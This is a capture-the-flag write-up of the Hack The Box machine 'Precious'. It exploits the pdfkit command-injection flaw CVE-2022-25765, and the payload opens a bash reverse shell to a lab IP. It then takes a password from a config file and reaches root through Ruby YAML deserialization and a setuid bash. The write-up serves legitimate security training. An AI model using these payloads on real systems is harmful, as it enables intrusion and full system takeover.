Hack The Box. Passage Precious. Vulnerability CVE-2022-25765
Collection of information
First of all, let’s collect information about the car.
We use nmap with the -sV -sC switches:
The scan showed that port 22 and port 80 are open. We see that port 80 redirects to http://precious.htb . To see the site, add it to /etc/hosts .
Let’s see what directories there are using the dirsearch tool:
There’s nothing. Let’s check the web server. When going to precious.htb , we see this page:
The web server offers a service for converting web pages to a PDF file. Let’s check if it works. Let’s start a local server at home.
Let’s create index.html in the localhost directory, and add it to the address bar:
It worked! Download the PDF file, let’s see what it is:
Let’s see its properties, it was created by pdfkit v.0.8.6 .
Looks like a normal PDF file. We look at its properties and see that the PDF was created by pdfkit v.0.8.6 .
A quick search on google leads us to the fact that there is a vulnerability CVE-2022-25765, and we can find out that this version of pdfkit is vulnerable to command injections.
You can learn more about CVE here: https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
According to CVE, “an application could be vulnerable if it tries to render a URL that contains query string parameters with user input” and “if the provided parameter happens to contain a URL encoded character and a shell command substitution string, it will be included in the command that PDFKit executes to render the PDF”. That’s enough to get in!
Run netcat listening on port 4444:
sudo nc -lnvp 4444
In the http://precious.htb web service, we modify the exploit to our needs and enter:
http://localhost.com/?name=#{‘%20`bash -c “bash -i >& /dev/tcp/10.10.14.33/4444 0>&1″`’}
We look in the terminal and see that we have entered.
Get user flag:
Whoami → ruby
So we logged into the server as a ruby user. Let’s move to the /home folder and find two more folders in it. One of them is our ruby user, and the second one is for user henry. Inside the henry folder, we find the user.txt file. This is our flag. But we don’t have access to it yet.
Looking around, we find a file in /home/ruby/.bundle called config.
We look at the contents of cat config. and find the password for user henry.
Using the henry data, connect via ssh to the server under user henry:
Now we can look at user.txt, and take the first flag!
Get the root flag:
Now that we’re inside as henry, let’s see what we can do. We use the sudo -l command, and see what can be run:
It looks like henry can run the update_dependencies.rb file as root, use cat and examine the file.
We look at the code and find that it uses YAML.load , which is vulnerable to a deserialization attack.
You can read more about YAML deserialization attacks here:
A short search led to https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/ find dependencies.yml and modify it.
Sudo nano dependencies.yml, and take the Ruby on Rails code from the post above.
In the git_set: id line, we write “chmod 4777 /bin/bash”, if everything is thought out correctly, this will allow us to get root.
We start the file.
sudo /usr/bin/ruby /opt/update_dependencies.rb
It worked!
Try /bin/bash -p
Done, take the root flag!
